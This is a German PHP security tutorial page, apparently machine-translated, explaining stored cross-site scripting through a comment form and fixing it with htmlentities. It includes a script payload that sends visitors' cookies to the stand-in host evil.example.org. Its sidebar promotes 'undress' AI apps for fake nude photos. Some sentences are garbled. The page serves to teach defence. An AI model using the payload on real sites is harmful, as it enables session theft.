PHP-Sicherheit – Cross-Site-Scripting-Angriff
Cross-Site-Scripting-Angriff
Cross-Site-Scripting-Angriff ist einer der bekannte Angriffsmethoden ein. Webanwendungen auf allen Plattformen sind von diesem Problem betroffen, und PHP-Anwendungen bilden da keine Ausnahme.
Alle Anwendungen mit Eingaben sind gefährdet. Webmail, Foren, Gästebücher und sogar Blogs. Tatsächlich stellen die meisten Webanwendungen Eingaben zur Verfügung, um mehr Menschen anzulocken, aber gleichzeitig setzen sie sich dadurch auch einem Risiko aus. Cross-Site-Scripting-Schwachstellen treten auf, wenn Eingaben nicht ordnungsgemäß bereinigt und maskiert werden.
Nehmen Sie als Beispiel eine Anwendung, die die Eingabe von Kommentaren auf jeder Seite ermöglicht. Sie verwendet das folgende Formular, um Benutzern beim Senden zu helfen:
CODE:
<form action="comment.php" method="POST" /> <p>Name: <input type="text" name="name" /><br /> Comment: <textarea name="comment" rows="10" cols="60"></textarea><br /> <input type="submit" value="Add Comment" /></p> </form>
Das Programm besucht diese Seite zu andere Benutzer zeigen Kommentare. Beispielsweise könnte ein Codeausschnitt wie der folgende verwendet werden, um einen Kommentar ($comment) und seinen entsprechenden Autor ($name) auszugeben:
CODE:
<?php echo "<p>$name writes:<br />"; echo "<blockquote>$comment</blockquote></p>"; ?>
Dieser Prozess berücksichtigt vollständig die Werte von $comment und $ Stellen Sie sich beim Namen Trust vor, dass der Inhalt eines von ihnen den folgenden Code enthält:
CODE:
<script> document.location = 'http://evil.example.org/steal.php?cookies=' + document.cookie </script>
Wenn Ihre Benutzer diesen Kommentar sehen, ist das dasselbe, als würden Sie anderen erlauben, Javascript-Code zu Ihrem Website-Quellprogramm hinzuzufügen. Ihre Benutzer senden ihre Cookies unwissentlich an evil.example.org und das empfangende Programm (steal.php) kann über die Variable $_GET['cookies'] auf alle Cookies zugreifen.
Dies ist ein häufiger Fehler, der meist durch schlechte Programmiergewohnheiten verursacht wird. Glücklicherweise sind solche Fehler leicht zu vermeiden. Da dieses Risiko nur auftritt, wenn Sie kontaminierte Daten ausgeben, stellen Sie einfach sicher, dass Sie die Eingabe filtern und die Ausgabe maskieren, wie in Kapitel 1 beschrieben.
Zumindest Sie verwenden htmlentities( ), um alle Daten zu maskieren, die Sie an den Client ausgeben möchten. Diese Funktion kann alle Sonderzeichen in eine HTML-Darstellung umwandeln. Nachdem alle Zeichen konvertiert wurden, die den Browser zu einer speziellen Verarbeitung veranlassen, kann sichergestellt werden, dass der ursprünglich eingegebene Inhalt angezeigt wird.
Daher ist es sicherer, den folgenden Code zum Anzeigen von Kommentaren zu verwenden:
CODE:
<?php $clean = array(); $html = array(); /* Filter Input ($name, $comment) */ $html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8'); $html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8'); echo "<p>{$html['name']} writes:<br />"; echo "<blockquote>{$html['comment']}</blockquote></p>"; ?>
Das Obige ist der Inhalt des PHP-Sicherheits-Cross-Site-Scripting-Angriffs. Weitere verwandte Inhalte finden Sie hier die chinesische PHP-Website (www.php.cn)!

Heiße KI -Werkzeuge

Undresser.AI Undress
KI-gestützte App zum Erstellen realistischer Aktfotos

AI Clothes Remover
Online-KI-Tool zum Entfernen von Kleidung aus Fotos.

Undress AI Tool
Ausziehbilder kostenlos

Clothoff.io
KI-Kleiderentferner

Video Face Swap
Tauschen Sie Gesichter in jedem Video mühelos mit unserem völlig kostenlosen KI-Gesichtstausch-Tool aus!

Heißer Artikel

Heiße Werkzeuge

Notepad++7.3.1
Einfach zu bedienender und kostenloser Code-Editor

SublimeText3 chinesische Version
Chinesische Version, sehr einfach zu bedienen

Senden Sie Studio 13.0.1
Leistungsstarke integrierte PHP-Entwicklungsumgebung

Dreamweaver CS6
Visuelle Webentwicklungstools

SublimeText3 Mac-Version
Codebearbeitungssoftware auf Gottesniveau (SublimeText3)

Heiße Themen

PHP 8.4 bringt mehrere neue Funktionen, Sicherheitsverbesserungen und Leistungsverbesserungen mit einer beträchtlichen Menge an veralteten und entfernten Funktionen. In dieser Anleitung wird erklärt, wie Sie PHP 8.4 installieren oder auf PHP 8.4 auf Ubuntu, Debian oder deren Derivaten aktualisieren. Obwohl es möglich ist, PHP aus dem Quellcode zu kompilieren, ist die Installation aus einem APT-Repository wie unten erläutert oft schneller und sicherer, da diese Repositorys in Zukunft die neuesten Fehlerbehebungen und Sicherheitsupdates bereitstellen.

Wenn Sie ein erfahrener PHP-Entwickler sind, haben Sie möglicherweise das Gefühl, dass Sie dort waren und dies bereits getan haben. Sie haben eine beträchtliche Anzahl von Anwendungen entwickelt, Millionen von Codezeilen debuggt und eine Reihe von Skripten optimiert, um op zu erreichen

Visual Studio Code, auch bekannt als VS Code, ist ein kostenloser Quellcode-Editor – oder eine integrierte Entwicklungsumgebung (IDE) –, die für alle gängigen Betriebssysteme verfügbar ist. Mit einer großen Sammlung von Erweiterungen für viele Programmiersprachen kann VS Code c

JWT ist ein offener Standard, der auf JSON basiert und zur sicheren Übertragung von Informationen zwischen Parteien verwendet wird, hauptsächlich für die Identitätsauthentifizierung und den Informationsaustausch. 1. JWT besteht aus drei Teilen: Header, Nutzlast und Signatur. 2. Das Arbeitsprinzip von JWT enthält drei Schritte: Generierung von JWT, Überprüfung von JWT und Parsingnayload. 3. Bei Verwendung von JWT zur Authentifizierung in PHP kann JWT generiert und überprüft werden, und die Funktionen und Berechtigungsinformationen der Benutzer können in die erweiterte Verwendung aufgenommen werden. 4. Häufige Fehler sind Signaturüberprüfungsfehler, Token -Ablauf und übergroße Nutzlast. Zu Debugging -Fähigkeiten gehört die Verwendung von Debugging -Tools und Protokollierung. 5. Leistungsoptimierung und Best Practices umfassen die Verwendung geeigneter Signaturalgorithmen, das Einstellen von Gültigkeitsperioden angemessen.

Dieses Tutorial zeigt, wie XML -Dokumente mit PHP effizient verarbeitet werden. XML (Extensible Markup-Sprache) ist eine vielseitige textbasierte Markup-Sprache, die sowohl für die Lesbarkeit des Menschen als auch für die Analyse von Maschinen entwickelt wurde. Es wird üblicherweise für die Datenspeicherung ein verwendet und wird häufig verwendet

Eine Zeichenfolge ist eine Folge von Zeichen, einschließlich Buchstaben, Zahlen und Symbolen. In diesem Tutorial wird lernen, wie Sie die Anzahl der Vokale in einer bestimmten Zeichenfolge in PHP unter Verwendung verschiedener Methoden berechnen. Die Vokale auf Englisch sind a, e, i, o, u und sie können Großbuchstaben oder Kleinbuchstaben sein. Was ist ein Vokal? Vokale sind alphabetische Zeichen, die eine spezifische Aussprache darstellen. Es gibt fünf Vokale in Englisch, einschließlich Großbuchstaben und Kleinbuchstaben: a, e, ich, o, u Beispiel 1 Eingabe: String = "TutorialPoint" Ausgabe: 6 erklären Die Vokale in der String "TutorialPoint" sind u, o, i, a, o, ich. Insgesamt gibt es 6 Yuan

Statische Bindung (statisch: :) implementiert die späte statische Bindung (LSB) in PHP, sodass das Aufrufen von Klassen in statischen Kontexten anstatt Klassen zu definieren. 1) Der Analyseprozess wird zur Laufzeit durchgeführt.

Was sind die magischen Methoden von PHP? Zu den magischen Methoden von PHP gehören: 1. \ _ \ _ Konstrukt, verwendet, um Objekte zu initialisieren; 2. \ _ \ _ Destruct, verwendet zur Reinigung von Ressourcen; 3. \ _ \ _ Call, behandeln Sie nicht existierende Methodenaufrufe; 4. \ _ \ _ GET, Implementieren Sie den dynamischen Attributzugriff; 5. \ _ \ _ Setzen Sie dynamische Attributeinstellungen. Diese Methoden werden in bestimmten Situationen automatisch aufgerufen, wodurch die Code -Flexibilität und -Effizienz verbessert werden.
